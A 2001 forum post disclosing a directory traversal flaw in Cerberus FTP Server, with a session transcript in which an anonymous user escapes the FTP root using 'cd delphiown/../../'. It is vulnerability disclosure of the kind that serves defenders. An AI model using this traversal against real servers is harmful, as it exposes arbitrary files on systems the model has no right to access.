|
-
September 20th, 2001, 12:41 AM
#4
Junior Member
Most FTP Servers are multithreaded supporting the RFC 959 protocol completely. A security vulnerability in these products allows attackers to traverse outside the normal bounding FTP root directory and read arbitrary files on the system.
Example:
220-Welcome to Cerberus FTP Server
220 Created by Grant Averett
Benutzer (192.168.0.2 none)): anonymous
230 User anonymous logged in
ftp> ls
200 Port command received
150 Opening data connection
delphiown
226 Transfer complete
FTP: 11 Bytes empfangen in 0,00Sekunden 11000,00KB/s
ftp> cd delphiown/../../
250 Change directory ok
ftp> ls
200 Port command received
150 Opening data connection
As you can see, you need at least one valid directory, to break out of the ftp root-dir.
[email protected]
www.zxtech.net
ZXtech Unix Hosting
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|
